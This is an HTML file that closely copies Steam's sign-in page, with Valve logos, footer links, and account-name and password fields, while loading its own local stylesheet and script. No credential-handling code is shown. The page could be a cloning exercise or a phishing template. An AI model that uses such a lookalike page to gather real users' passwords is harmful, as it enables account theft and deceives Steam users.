<!DOCTYPE html>
<html>
    <head>
        <link rel="stylesheet" href="css/style.css">
        <link rel="stylesheet" href="css/media.css">
        <style type="text/css">
            html {
    margin: 0;
    padding: 0;
    background: #171a21;
}

a {
    text-decoration: none;
}

body {
    margin: 0;
    padding: 0;
    font-family: "Motiva Sans", Sans-serif;
}

.header {
    width: auto;
    background: #171a21;
}

.header_adaptive_box {
    display: none;
    background: #171a21;
    position: fixed;
    top: 0;
    left: 0;
    right: 0;
    text-align: center;
    z-index: 20;
    box-shadow: 0 0 7px 0 rgb(0 0 0 / 75%);
    overflow: hidden;
    padding: 13px 8px;
}

.responsive_page_menu_ctn {
    position: fixed;
    top: 0;
    bottom: 0;
    overflow: hidden;
    background: black;
    z-index: 30;
    width: 280px;
    display: none;
}

.menu_active {
    display: block;
}

.responsive_page_menu {
    position: absolute;
    top: 0;
    left: 0;
    bottom: 0;
    right: 0;
    overflow: hidden;
    overflow-y: auto;
}

.mainmenu_contents {
    background: #171a21;
    font-size: 22px;
    position: relative;
    min-height: 100%;
}

.mainmenu_contents_items {
    font-family: "Motiva Sans", Sans-serif;
    font-weight: 200;
}

.menuitem {
    position: relative;
    color: #bdbdbd;
    background: #171a21;
    border-top: 1px solid #2f3138;
    border-bottom: 1px solid #000000;
    display: block;
    padding: 0 12px;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    line-height: 2.5em;
    text-decoration: none;
    cursor: pointer;
}

.minor_menu_items {
    border-top: 1px solid #2f3138;
    border-bottom: none;
}

.menuitem {
    position: relative;
    color: #bdbdbd;
    background: #171a21;
    border-top: 1px solid #2f3138;
    border-bottom: 1px solid #000000;
    display: block;
    padding: 0 12px;
    overflow: hidden;
    text-overflow: ellipsis;
    white-space: nowrap;
    line-height: 2.5em;
    text-decoration: none;
    cursor: pointer;
}

.change_language_action {
    border: none;
    font-size: 0.75em;
    color: #8a8a8a;
}

.mainmenu_footer_spacer {
    height: 160px;
}

.mainmenu_footer {
    position: absolute;
    left: 0;
    right: 0;
    bottom: 0;
    font-size: 10px;
    white-space: normal;
    color: #8a8a8a;
    padding: 0 12px 24px 12px;
}

.mainmenu_footer_logo {
    font-size: 10px;
    white-space: normal;
    color: #8a8a8a;
}

.mainmenu_valve_links {
    font-size: 10px;
    white-space: normal;
    color: #8a8a8a;
}

.mainmenu_valve_links a {
    color: #8a8a8a;
}

.menu_logo {
    position: absolute;
    top: 9px;
    left: 8px;
    cursor: pointer;
    width: 36px;
    height: 31px;
}

.top_content {
    width: 940px;
    display: flex;
    height: 104px;
    margin: 0px auto;
    justify-content: space-between;
}

.top_menu {
    align-self: center;
    display: flex;
} 

.top_menu a {
    font-size: 13px;
    color: #b8b6b4;
    text-shadow: 1px 1px 2px #000000aa;
    padding-top: 6px;
    padding-left: 8px;
    padding-right: 8px;
}

.logo {
    align-self: center;
    color: #b8b6b4;
    margin-top: 4px;
}

.logo_menu_box {
    display: flex;
    width: 496px;
    justify-content: space-between;
}

.action_menu {
    line-height: 24px;
    vertical-align: top;
    width: auto;
    padding-right: 13px;
}

.global_action_menu {
    color: #b8b6b4;
    font-size: 11px;
    display: flex;
    justify-content:space-between;
    width: fit-content;
    margin-top: 6px;
}

.install_btn {
    background: #5c7e10;
    display: flex;
    height: 24px;
    margin-right: 10px;
}

.install_btn a {
    background-repeat: no-repeat;
    text-decoration: none;
    color: #e5e4dc;
    font-weight: normal;
    display: inline-block;
    padding-left: 35px;
    padding-right: 9px;
    align-self: center;
    background-position: 10px 5px;
    background-image: url(https://store.cloudflare.steamstatic.com/public/shared/images/header/btn_header_installsteam_download.png?v=1);
    font-size: 11px;
}

.login_lang_box {
    display: flex;
    justify-content: space-between;
    width: 109px;
}

.login {
    font-size: 11px;
    color: #b8b6b4;
    text-decoration: none;
    align-content: center;
    margin-bottom: 10px;
}

.language {
    padding-right: 18px;
    background-image: url(https://store.cloudflare.steamstatic.com/public/shared/images/popups/btn_arrow_down_padded.png);
    background-position: right center;
    background-repeat: no-repeat;
    height: 24px;
}

.center_content {
    padding: 0px 8px;
    width: 100%;
    padding-bottom: 137px;
    background: radial-gradient(rgba(24, 26, 33, 0) 0%, #181A21 100%) fixed no-repeat, url(https://store.cloudflare.steamstatic.com/public/shared/images/joinsteam/new_login_bg_strong_mask.jpg) center top no-repeat, #181A21;

}

.center_content_box {
    width: 700px;
    height: 423px;
    margin-right: auto;
    margin-left: auto;
    padding-top: 94px;
}

.sign_in_background {
    background-color: #181a21;
    border-radius: 4px;
    padding: 24px 32px;
    flex: 1;
    min-width: 636px;
    margin-top: 44px;
}

.sign_in_box {
    display: flex;
    flex-direction: row;
    flex: 1;
    justify-content: space-between;
    height: 282px;
    width: 636px;
}

.sign_in {
    display: flex;
    flex-direction: column;
    justify-content: space-between;
    height: 100%;
    width: 412px;
}

.enter_login {
    width: 100%;
    margin-top: 3px;
}

input {
    border-radius: 2px;
    color: #fff;
    padding: 10px;
    background-color: #32353c;
    outline: none;
    font-size: 15px;
    grid-area: input;
    border: 1px solid #32353c;
    display: inline-block;
    text-align: start;
    width: 392px;
    margin-top: 3px;
}

.enter_password {
    width: 100%;
}

.sign_login {
    color: #1999ff;
    font-weight: 500;
    font-size: 12px;
    text-transform: uppercase;
    letter-spacing: .02em;
    user-select: none;
}

.sign_password {
    font-size: 12px;
    color: #afafaf;
    text-transform: uppercase;
    letter-spacing: .02em;
    user-select: none;
}

.sign_heading {
    width: 100%;
    color: #fff;
    font-size: 32px;
    text-transform: uppercase;
    letter-spacing: .055em;
    font-weight: 200;
    margin-left: 18px;
}

.rememberme {
    display: flex;
    flex-direction: row;
    align-items: center;
    cursor: pointer;
    margin-bottom: 0px;
    margin-top: 2px;
}

.remember_text {
    color: #afafaf;
    font-size: 12px;
    user-select: none;
    padding-left: 6px;
}

.newlogindialog_Checkbox_3tTFg {
    width: 14px;
    height: 14px;
    padding: 3px;
    border-radius: 2px;
    background-color: #32353c;
    cursor: pointer;
    color: #E9E9E9;
}

.newlogindialog_Check_6EoZE {
    width: 100%;
    height: 100%;
    display: flex;
    color: #E9E9E9;
}

.SVGIcon_Button {
    fill: #fff;
    overflow: visible;
    width: 100%;
    height: 100%;
    max-width: 320px;
    max-height: 320px;
    color: #E9E9E9;
}

.submit_btn {
    width: 270px;
    position: relative;
    background: linear-gradient(90deg, #06BFFF 0%, #2D73FF 100%);
    border-radius: 2px;
    border: none;
    outline: none;
    padding: 12px;
    color: #fff;
    font-size: 18px;
    font-weight: 500;
    font-family: inherit;
    text-align: center;
    letter-spacing: .03em;
    cursor: pointer;
    align-self: center;
    margin-bottom: 31px;
    height: 50px;
}

.signin_help {
    text-align: center;
    color: #afafaf;
    font-size: 12px;
    text-decoration: underline;
    cursor: pointer;
    display: flex;
    align-self: center;
    margin-bottom: 2px;
}

.feature_heading {
    color: #1999ff;
    font-weight: 500;
    font-size: 12px;
    line-height: 16px;
    margin: 6px 0px;
    text-transform: uppercase;
    letter-spacing: .02em
}

.qr_feature_box {
    width: 200px;
    display: flex;
    flex-direction: column;
    align-items: flex-start;
}

.qr_box {
    display: flex;
    flex-direction: row;
    align-items: center;
    padding: 8px 0px;
    color: #E9E9E9;
    font-size: 12px;
}

.phone_svg {
    width: 120px;
    fill: #afafaf;
    height: 52px;
    overflow: hidden;
}

.beta_text {
    font-weight: 400;
    font-size: 12px;
    line-height: 16px;
    color: #afafaf;
    margin: 8px;
}

.learn_more_btn {
    background-color: rgba(255,255,255,.1);
    border-radius: 2px;
    font-weight: 700;
    font-size: 12px;
    line-height: 20px;
    text-align: center;
    color: #fff;
    padding: 8px 16px;
    text-decoration: none;
}

.show_qr {
    text-align: center;
    text-decoration-line: underline;
    font-weight: 400;
    font-size: 12px;
    line-height: 24px;
    color: #afafaf;
    padding: 12px 0px;
    cursor: pointer;
}

.bottom_content {
    display: flex;
    flex-direction: row;
    padding-top: 48px;
    align-items: center;
    margin-right: auto;
    margin-left: auto;
    width: 100%;
    justify-content: center;
    background-color: #181A21;
}

.bottom_content_item {
    flex: 1;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
    max-width: 200px;
    font-size: 12px;
    color: #E9E9E9;
}

.join_text {
    font-size: 14px;
    color: #b8b6b4
}

.join_more_btn {
    max-width: 60%;
    text-align: center;
    font-size: 14px;
    margin-top: 10px;
    color: #FFFFFF;
}

.join_img {
    max-width: 200px;
}

.join_btn_box {
    flex: 1;
    display: flex;
    flex-direction: column;
    justify-content: center;
    align-items: center;
    text-align: center;
    max-width: 200px;
    font-size: 12px;
    color: #E9E9E9;
    margin-top: 20px;
}

.join_btn {
    border-radius: 2px;
    border: none;
    padding: 1px;
    display: inline-block;
    cursor: pointer;
    text-decoration: none !important;
    color: #fff !important;
    background: transparent;
    margin: 20px 0 10px 0;
    display: block;
    text-align: center;
}

.join_btn span {
    padding: 0 15px;
    font-size: 15px;
    line-height: 30px;  
    border-radius: 2px;
    display: block;
    background: transparent;
    border: 1px solid rgba(255,255,255,0.4);
    border-radius: 2px;
}

.footer_box {
    background-color: #181A21;
}

.footer {
    font-family: Arial, Helvetica, sans-serif;
    padding: 16px 0 60px 0;
    margin: 0;
    text-size-adjust: none;
    -webkit-text-size-adjust: none;
    background: #171a21;
    padding-top: 126px;
}

.footer_content {
    width: 940px;
    margin: 0px auto;
    padding-top: 16px;
}

.footer_logo_steam {
    float: right;
    padding-top: 2px;
}

.footer_logo_steam img {
    height: 25px;
    width: auto;
}

.footer_logo {
    float: left;
    padding-top: 2px;
}

.footer_logo img {
    height: 25px;
    width: auto;
}

.footer_text {
    float: left;
    margin-left: 12px;
    color: #8F98A0;
    font-size: 12px;
    line-height: 16px;
}

.rule {
    height: 8px;
    border-top: 1px solid #363c44;
}

.footer_text a {
    color: #C6D4DF;
}

.valve_links {
    margin-top: 8px;
    float: left;
    font-family: "Motiva Sans", Sans-serif;
    font-weight: normal;
    font-size: 13px;
    color: #61686D;
}

.valve_links a {
    color: #C6D4DF;
}

.valve_links img {
    vertical-align: bottom;
}
        </style>
        <link rel="icon" href="img/favicon.ico">
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <title>Sign in</title>
    </head>
    <body>
        <div class="responsive_page_menu_ctn" id="adaptive_menu">
            <div class="responsive_page_menu" id="responsive_page_menu">
                <div class="mainmenu_contents">
                    <div class="mainmenu_contents_items">
                            <a class="menuitem" href="https://store.steampowered.com/login/?redir=login%2F%3Fl%3Denglish&amp;redir_ssl=1&amp;snr=1_60_4__global-header">Login</a>
                            <a class="menuitem supernav" href="" data-tooltip-type="selector" data-tooltip-content=".submenu_store">Store	                    
                                <div class="chevron"></div></a>
                            <a class="menuitem supernav" style="display: block" href="" data-tooltip-type="selector" data-tooltip-content=".submenu_community">Community
                                <div class="chevron"></div></a>                       
                            <a class="menuitem" href="https://help.steampowered.com/en/">Support</a>
                            <div class="minor_menu_items">
                                <div class="menuitem change_language_action">Change language</div>
                                <div class="menuitem change_language_action">View desktop website</div>
                            </div>
                    </div>
                    <div class="mainmenu_footer_spacer"></div>
                    <div class="mainmenu_footer">
                        <div class="mainmenu_footer_logo"><img src="https://store.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png"></div>
                        © Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the US and other countries.
                        <span class="mainmenu_valve_links">
                            <a href="https://store.steampowered.com/privacy_agreement/?snr=1_60_4__global-responsive-menu" target="_blank">Privacy Policy</a>
                            &nbsp;| &nbsp;<a href="http://www.valvesoftware.com/legal.htm" target="_blank">Legal</a>
                            &nbsp;| &nbsp;<a href="https://store.steampowered.com/subscriber_agreement/?snr=1_60_4__global-responsive-menu" target="_blank">Steam Subscriber Agreement</a>
                            &nbsp;| &nbsp;<a href="https://store.steampowered.com/steam_refunds/?snr=1_60_4__global-responsive-menu" target="_blank">Refunds</a>
                        </span>
                    </div>
                </div>
            </div>
        </div>
        <div class="header">
            <div class="top_content">
                <div class="logo_menu_box">
                    <div class="logo">
                        <a href="https://store.steampowered.com/?snr=1_60_4__global-header">
                            <img src="https://store.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016" width="176" height="44">
                        </a>
                    </div>
                    <div class="top_menu">
                        <a>STORE</a>
                        <a>COMMUNITY</a>
                        <a>ABOUT</a>
                        <a>SUPPORT</a>
                    </div>
                </div>
                <div class="action_menu">
                    <div class="global_action_menu">
                        <div class="install_btn">
                            <a href="https://store.steampowered.com/about/?snr=1_60_4__global-header">Install Steam</a>
                        </div>
                        <div class="login_lang_box">
                            <a class="login" href="https://store.steampowered.com/login/?redir=login%2F%3Fredir%3D%253Fsnr%253D1_4_4__global-header%26redir_ssl%3D1%26snr%3D1_4_4__global-header&amp;redir_ssl=1&amp;snr=1_60_4__global-header">login</a>
                            &nbsp;  |  &nbsp;
                            <span class="language">language</span> 
                        </div>                                                                                                   
                    </div>
                </div>
            </div>
        </div>
        <div class="header_adaptive_box">
            <div class="header_adaptive">
                <div class="menu_logo">
                    <img id="menu_btn" src="https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png" height="100%">
                </div>
                <div class="steam_logo">
                    <a href="https://store.steampowered.com/?snr=1_60_4__global-responsive-menu">
                        <img src="https://store.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png" height="36" alt="STEAM">
                    </a>
                </div>
            </div>
        </div>
        <div class="center_content" id="center_cont">
            <div class="center_content_box">
                <div class="sign_heading">Sign in</div>
                <div class="sign_in_background">
                    <div class="sign_in_box">
                        <div class="sign_in">
                            <div class="enter_login">
                                <div class="sign_login">Sign in with account name</div>
                                <input type="text">
                            </div>
                            <div class="enter_password">
                                <div class="sign_password">Password</div>
                                <input type="password">
                            </div>
                            <div class="rememberme">
                                <div tabindex="0" class="newlogindialog_Checkbox_3tTFg">
                                    <div class="newlogindialog_Check_6EoZE">
                                        <svg version="1.1" id="base" xmlns="http://www.w3.org/2000/svg" class="SVGIcon_Button" x="0px" y="0px" width="256px" height="256px" viewBox="0 0 256 256" stroke-width="35" stroke="#fff" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit="10">
                                            <polyline fill="none" points="49.5,147.75 95,210.75 206.5,45.25 "></polyline>
                                        </svg>
                                    </div>
                                </div>
                                <div class="remember_text">Remember me</div>
                            </div>
                            <button class="submit_btn" type="submit">Sign in</button>
                            <a class="signin_help" href="https://help.steampowered.com/wizard/HelpWithLogin?redir=https%3A%2F%2Fstore.steampowered.com%2Flogin%2F%3Fredir%3D%253Fsnr%253D1_4_4__global-header%26redir_ssl%3D1%26snr%3D1_4_4__global-header">Help, I can't sign in</a>
                        </div>
                        <div class="qr_feature_box">
                            <div class="feature_heading">New beta feature</div>
                            <div class="qr_box">
                                <svg class="phone_svg" width="34" height="52" viewBox="0 0 34 52" fill="none" xmlns="http://www.w3.org/2000/svg">
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M0.993001 3.2C0.993001 2.0799 0.993001 1.51984 1.21099 1.09202C1.40273 0.715695 1.7087 0.409734 2.08502 0.217987C2.51284 0 3.0729 0 4.193 0H29.793C30.9131 0 31.4732 0 31.901 0.217987C32.2773 0.409734 32.5833 0.715695 32.775 1.09202C32.993 1.51984 32.993 2.0799 32.993 3.2V48.8C32.993 49.9201 32.993 50.4802 32.775 50.908C32.5833 51.2843 32.2773 51.5903 31.901 51.782C31.4732 52 30.9131 52 29.793 52H4.193C3.0729 52 2.51284 52 2.08502 51.782C1.7087 51.5903 1.40273 51.2843 1.21099 50.908C0.993001 50.4802 0.993001 49.9201 0.993001 48.8V3.2ZM33 19.2967C33 19.1328 33.1328 19 33.2967 19C33.4606 19 33.5934 19.1328 33.5934 19.2967V25.8924C33.5934 26.0563 33.4606 26.1891 33.2967 26.1891C33.1328 26.1891 33 26.0563 33 25.8924V19.2967ZM0.690255 12.8531C0.854118 12.8531 0.986956 12.986 0.986956 13.1498V14.735C0.986956 14.8988 0.854118 15.0317 0.690255 15.0317C0.526392 15.0317 0.393555 14.8988 0.393555 14.735V13.1498C0.393555 12.986 0.526392 12.8531 0.690255 12.8531ZM0.986956 23.8975C0.986956 23.7337 0.854118 23.6008 0.690255 23.6008C0.526392 23.6008 0.393555 23.7337 0.393555 23.8975V27.8064C0.393555 27.9703 0.526392 28.1031 0.690255 28.1031C0.854118 28.1031 0.986956 27.9703 0.986956 27.8064V23.8975ZM0.690255 17.3557C0.854118 17.3557 0.986956 17.4886 0.986956 17.6524V21.5613C0.986956 21.7252 0.854118 21.858 0.690255 21.858C0.526392 21.858 0.393555 21.7252 0.393555 21.5613V17.6524C0.393555 17.4886 0.526392 17.3557 0.690255 17.3557Z" fill="#42464E"></path>
                                    <path fill-rule="evenodd" clip-rule="evenodd" d="M3.10899 2.54601C3 2.75992 3 3.03995 3 3.6V48.4C3 48.9601 3 49.2401 3.10899 49.454C3.20487 49.6422 3.35785 49.7951 3.54601 49.891C3.75992 50 4.03995 50 4.6 50H29.4C29.9601 50 30.2401 50 30.454 49.891C30.6422 49.7951 30.7951 49.6422 30.891 49.454C31 49.2401 31 48.9601 31 48.4V3.6C31 3.03995 31 2.75992 30.891 2.54601C30.7951 2.35785 30.6422 2.20487 30.454 2.10899C30.2401 2 29.9601 2 29.4 2H23C22.9469 2 22.8965 2.0232 22.8562 2.06277C22.7957 2.12213 22.7857 2.22585 22.7855 2.32129C22.7839 3.09871 22.7694 3.51909 22.6437 3.85908C22.4867 4.28385 22.2109 4.63059 21.8671 4.82458C21.5561 5 21.1565 5 20.3571 5H13.6429C12.8435 5 12.4439 5 12.1329 4.82458C11.7891 4.63059 11.5133 4.28385 11.3563 3.85908C11.2306 3.51909 11.2161 3.09871 11.2145 2.32129C11.2143 2.22585 11.2043 2.12213 11.1438 2.06277C11.1035 2.0232 11.0531 2 11 2H4.6C4.03995 2 3.75992 2 3.54601 2.10899C3.35785 2.20487 3.20487 2.35785 3.10899 2.54601Z" fill="#32353C"></path>
                                    <g clip-path="url(#clip0_1079_5430)">
                                        <path d="M24.3333 17.6667H22.5V19.5H24.3333V17.6667ZM26.1667 15.8333V21.3333H20.6667V15.8333H26.1667V15.8333ZM27.0833 26.8333H25.25C24.3333 26.8333 24.3333 26.8333 24.3333 27.75V31.4167C24.3333 32.3335 24.3333 32.3335 25.25 32.3335H27.0833C28 32.3335 28 32.3335 28 31.4167V27.75C28 26.8333 28 26.8333 27.0833 26.8333ZM21.5833 26.8333C20.6665 26.8333 20.6665 26.8333 20.6665 27.75C20.6665 28.6667 20.6665 28.6667 21.5833 28.6667C22.5 28.6667 22.5 28.6667 22.5 27.75C22.5 26.8333 22.5 26.8333 21.5833 26.8333ZM27.0833 34.1667C26.1665 34.1667 26.1665 34.1667 26.1665 35.0835C26.1665 36.0002 26.1665 36.0002 27.0833 36.0002C28 36 28 36 28 35.0833C28 34.1667 28 34.1667 27.0833 34.1667ZM16.0833 23.1667C15.1665 23.1667 15.1665 23.1667 15.1665 24.0835C15.1665 25.0002 15.1665 25.0002 16.0833 25.0002C17 25.0002 17 25 17 24.0833C17 23.1665 17 23.1667 16.0833 23.1667ZM11.5 17.6667H9.66674V19.5H11.5V17.6667ZM13.3333 15.8333V21.3333H7.83326V15.8333H13.3333V15.8333ZM14.25 14H6.91674C6 14 6 14 6 14.9167V24.0835C6 25 6 25 6.91674 25C7.83348 25 7.83348 25 7.83348 24.0833V23.1665H14.25C15.1667 23.1665 15.1667 23.1665 15.1667 22.2498V19.5H16.0835C17 19.5 17 19.5 17 18.5833C17 17.6665 17 17.6665 16.0833 17.6665H15.1665V14.9165C15.1667 14 15.1667 14 14.25 14ZM27.0833 30.5H23.4167C22.5 30.5 22.5 30.5 22.5 31.4167V34.1667H21.5833C20.6665 34.1667 20.6665 34.1667 20.6665 35.0835C20.6665 36.0002 20.6665 36.0002 21.5833 36.0002H23.4165C24.3333 36.0002 24.3333 36.0002 24.3333 35.0835V32.3335H27.0833C28 32.3335 28 32.3335 28 31.4167C28 30.5 28 30.5 27.0833 30.5ZM19.75 30.5C18.8333 30.5 18.8333 30.5 18.8333 31.4167C18.8333 32.3335 18.8333 32.3335 19.75 32.3335C20.6667 32.3335 20.6667 32.3335 20.6667 31.4167C20.6667 30.5 20.6667 30.5 19.75 30.5ZM10.5833 25C9.66652 25 9.66652 25 9.66652 25.9167V26.8335H6.91652C6 26.8333 6 26.8333 6 27.75V35.0833C6 36 6 36 6.91674 36H14.25C15.1667 36 15.1667 36 15.1667 35.0833V34.1665H17V35.0833C17 36 17 36 17.9167 36C18.8335 36 18.8335 36 18.8335 35.0833V33.25C18.8335 32.3333 18.8335 32.3333 17.9167 32.3333H15.1667V30.5H17.9167C18.8335 30.5 18.8335 30.5 18.8335 29.5833C18.8335 28.6665 18.8335 28.6665 17.9167 28.6665H15.1667V27.75C15.1667 26.8333 15.1667 26.8333 14.25 26.8333H11.5V25.9165C11.5 25 11.5 25 10.5833 25ZM13.3333 28.6667V34.1667H7.83326V28.6667H13.3333ZM11.5 30.5H9.66674V32.3333H11.5V30.5ZM27.0833 14H17.9167C17 14 17 14 17 14.9167C17 15.8335 17 15.8335 17.9167 15.8335H18.8335V22.25C18.8335 23.1667 18.8335 23.1667 19.7502 23.1667H20.667V24.0835C20.667 25.0002 20.667 25.0002 21.5837 25.0002C22.5 25 22.5 25 22.5 24.0833V23.1665H24.3333V27.75C24.3333 28.6667 24.3333 28.6667 25.25 28.6667C26.1667 28.6667 26.1667 28.6667 26.1667 27.75V23.1667H27.0835C28.0002 23.1667 28.0002 23.1667 28.0002 22.25V14.9167C28 14 28 14 27.0833 14Z" fill="#AFAFAF"></path>
                                    </g>
                                    <defs>
                                        <clipPath id="clip0_1079_5430">
                                            <rect width="22" height="22" fill="currentColor" transform="translate(6 14)"></rect>
                                        </clipPath>
                                    </defs>
                                </svg>
                                <div class="beta_text">Steam Mobile App beta testers can sign in by scanning a QR code.</div>
                            </div>
                            <a href="https://steamcommunity.com/groups/SteamMobileApp" class="learn_more_btn">Learn more</a>
                            <div class="show_qr">I'm in the beta, show me a QR code</div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
        <div class="bottom_content">
            <div class="bottom_content_item">
                <div class="join_text">Join Steam and discover thousands of games to play.</div>
                <a class="join_more_btn" href="https://store.steampowered.com/about">Learn More</a>
            </div>
            <img alt="Join Steam" class="join_img" src="https://store.cloudflare.steamstatic.com/public/shared/images/login/join_pc.png?v=1">
            <div class="join_btn_box">
                <a target="_top" href="https://store.steampowered.com/join/?redir=%3Fsnr%3D1_4_4__global-header&amp;snr=1_60_4__62" class="join_btn">
                    <span>Join Steam</span>
                </a>
                <div class="join_text">It's free and easy to use.</div>
            </div>
        </div>
        <div class="footer_box">
            <div class="footer">
                <div class="footer_content">
                    <div class="rule"></div>
                    <div class="footer_logo_steam">
                        <img src="https://store.cloudflare.steamstatic.com/public/images/v6/logo_steam_footer.png" alt="Valve Software">
                    </div>
                    <div class="footer_logo">
                        <a href="http://www.valvesoftware.com" target="_blank" rel="noreferrer">
                            <img src="https://store.cloudflare.steamstatic.com/public/images/footerLogo_valve_new.png" alt="Valve Software">
                        </a>
                    </div>
                    <div class="footer_text" data-panel="{&quot;flow-children&quot;:&quot;row&quot;}">
                        <div>© 2022 Valve Corporation.  All rights reserved.  All trademarks are property of their respective owners in the US and other countries.</div>
                        <div>VAT included in all prices where applicable.&nbsp;&nbsp;
                            <a href="https://store.steampowered.com/privacy_agreement/?snr=1_44_44_" target="_blank" rel="noreferrer">Privacy Policy</a>
                            &nbsp; | &nbsp;
                            <a href="https://store.steampowered.com/legal/?snr=1_44_44_" target="_blank" rel="noreferrer">Legal</a>
                            &nbsp; | &nbsp;
                            <a href="https://store.steampowered.com/subscriber_agreement/?snr=1_44_44_" target="_blank" rel="noreferrer">Steam Subscriber Agreement</a>
                            &nbsp; | &nbsp;
                            <a href="https://store.steampowered.com/steam_refunds/?snr=1_44_44_" target="_blank" rel="noreferrer">Refunds</a>
                            &nbsp; | &nbsp;
                            <a href="https://store.steampowered.com/account/cookiepreferences/?snr=1_44_44_" target="_blank" rel="noreferrer">Cookies</a>
                        </div>
                    </div>
                    <div style="clear: left;"></div>
                    <br>
                    <div class="rule"></div>
                    <div class="valve_links" data-panel="{&quot;flow-children&quot;:&quot;row&quot;}">
                        <a href="http://www.valvesoftware.com/about" target="_blank" rel="noreferrer">About Valve</a>
                        &nbsp; | &nbsp;<a href="http://www.valvesoftware.com" target="_blank" rel="noreferrer">Jobs</a>
                        &nbsp; | &nbsp;<a href="http://www.steampowered.com/steamworks/" target="_blank" rel="noreferrer">Steamworks</a>
                        &nbsp; | &nbsp;<a href="https://partner.steamgames.com/steamdirect" target="_blank" rel="noreferrer">Steam Distribution</a>
                        &nbsp; | &nbsp;<a href="https://help.steampowered.com/en/?snr=1_44_44_">Support</a>
                        &nbsp; | &nbsp;<a href="https://store.steampowered.com/digitalgiftcards/?snr=1_44_44_" target="_blank" rel="noreferrer">Gift Cards</a>
                        &nbsp; | &nbsp;<a href="https://steamcommunity.com/linkfilter/?url=http://www.facebook.com/Steam" target="_blank" rel="noopener"><img src="https://store.cloudflare.steamstatic.com/public/images/ico/ico_facebook.gif"> Steam</a>
                        &nbsp; | &nbsp;<a href="http://twitter.com/steam" target="_blank" rel="noreferrer"><img src="https://store.cloudflare.steamstatic.com/public/images/ico/ico_twitter.gif"> @steam</a>
                    </div>
                </div>
            </div>
        </div>
        <script src="js/main.js"></script>
    </body>
</html>